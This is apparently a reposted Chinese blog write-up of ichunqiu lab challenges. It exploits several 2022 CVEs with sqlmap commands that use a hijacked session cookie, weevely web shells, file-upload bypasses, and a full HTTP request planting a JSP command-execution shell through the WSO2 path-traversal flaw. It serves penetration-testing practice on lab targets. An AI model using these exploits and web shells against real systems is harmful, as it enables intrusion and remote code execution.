春秋云镜靶场攻略(一)

admin 2023年7月25日10:02:15评论42 views字数 3852阅读12分50秒阅读模式

本文我们将春秋云镜的靶场进行渗透演示。为学习的小伙伴提供思路!

CVE-2022-32991

首先,根据提示我们发现是该CMS的welcome.php中存在SQL注入攻击。但是当我们访问该地址时,发现需要登录。

春秋云镜靶场攻略(一)我们随便注册一个账号进行登录。登录后发现欢迎页面便是welcome.php?q=1

春秋云镜靶场攻略(一)

点击start发现抱错了。春秋云镜靶场攻略(一)

直接sqlmap 撸一发发现报错了。

sqlmap -u http://eci-2ze9g20e9kazcv7miha6.cloudeci1.ichunqiu.com/welcome.php?q=1 --dbs 

春秋云镜靶场攻略(一)原因很简单,是因为该页面需要登录才能访问到welcome.php?q=1。我们用burp抓包,获取cookie伪造登录请求再试试。

春秋云镜靶场攻略(一)

伪造登录

--user-agent:伪造请求为浏览器,逃逸waf

--cookie :伪造用户cookie

sqlmap -u "http://eci-2ze9g20e9kazcv7miha6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" c="Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" --cookie="PHPSESSID=q269p7omvdcv6e8jgr4aumlo8o"  --dbs 

春秋云镜靶场攻略(一)

爆表

sqlmap -u "http://eci-2ze9g20e9kazcv7miha6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" --cookie="PHPSESSID=q269p7omvdcv6e8jgr4aumlo8o"  -D "ctf" --tables

春秋云镜靶场攻略(一)

获取字段

sqlmap -u "http://eci-2ze9g20e9kazcv7miha6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" --cookie="PHPSESSID=q269p7omvdcv6e8jgr4aumlo8o"  -D "ctf" -T "flag" --columns

获取flag

sqlmap -u "http://eci-2ze9g20e9kazcv7miha6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" --cookie="PHPSESSID=q269p7omvdcv6e8jgr4aumlo8o"  -D "ctf" -T "flag" -C"flag" --dump
春秋云镜靶场攻略(一)

CVE-2022-30887

根据系统的描述,该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。当我们启动靶场后,发现就一个登录界面。

春秋云镜靶场攻略(一)尝试常用的弱口令登录,也不行。在无果的情况下发现网站的页脚有作者的信息Mayuri K。点击跳转到作者的主页。我们可以尝试用作者的email和name作为用户名和密码。email:[email protected] passwd:mayurik登录成功后,我们到上传图片的位置。

春秋云镜靶场攻略(一)

接着在kali中我们生成一句话

weevely generate 8888 /root/22.php

春秋云镜靶场攻略(一)

上传一句话

春秋云镜靶场攻略(一)

复制图片链接(php的路径)春秋云镜靶场攻略(一)

连接一句话

weevely http://eci-2ze6nxpzgmh3rmfxygoe.cloudeci1.ichunqiu.com/assets/myimages/22.php 8888

春秋云镜靶场攻略(一)

通过cd命令 查找flag春秋云镜靶场攻略(一)

CVE-2022-29464

访问站点,并对其进行抓包。修改包的内容为下(更改为你的host地址)

POST /fileupload/toolsAny HTTP/2
Host: eci-2zebq0nhwv7a0w8g9ev5.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 901
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0

--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--

当浏览器访问如下时,证明成功。春秋云镜靶场攻略(一)

春秋云镜靶场攻略(一)

浏览器访问http://xxxxx//authenticationendpoint/wavesky.jsp?cmd=ls效果如下:春秋云镜靶场攻略(一)

构建Paylaod

http://eci-2zebatw8ycbn3iy83ttr.cloudeci1.ichunqiu.com:9445//authenticationendpoint/wavesky.jsp?cmd=ls+%2F+-lah

春秋云镜靶场攻略(一)

获取flag

http://eci-2zebatw8ycbn3iy83ttr.cloudeci1.ichunqiu.com:9445//authenticationendpoint/wavesky.jsp?cmd=ls+%2Fflag

CVE-2022-28525

该漏洞还是关于文件上传,运行靶场后,我们用弱口令进行登录。随便对任意一个用户修改头像信息。并上传php一句话。(无法直接上传php,将php保存为jpg后在burp中再改回就是了。)

春秋云镜靶场攻略(一)

burp抓包,将jpg改为php

春秋云镜靶场攻略(一)

CVE-2022-28512

/single.php路径下,id参数存在一个SQL注入漏洞。参考CVE-2022-32991 直接在sqlmap中跑就行了。

sqlmap -u "http://eci-2ze87gl3jd6bk4z2pnvm.cloudeci1.ichunqiu.com/single.php?id=1" --dbs
春秋云镜靶场攻略(一)

CVE-2022-28060

同样还是sql注入问题。但是登录框存在sql注入。因此我们需要用burp对登录数据进行抓包。并保存txt文件。再用sqlmap跑就行了。

sqlmap -r "22.txt" --sql-shell -v
select load_file('/flag')
春秋云镜靶场攻略(一)

更多精彩文章 欢迎关注我们

原文始发于微信公众号(kali黑客笔记):春秋云镜靶场攻略(一)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月25日10:02:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   春秋云镜靶场攻略(一)https://cn-sec.com/archives/1905179.html

发表评论

匿名网友 填写信息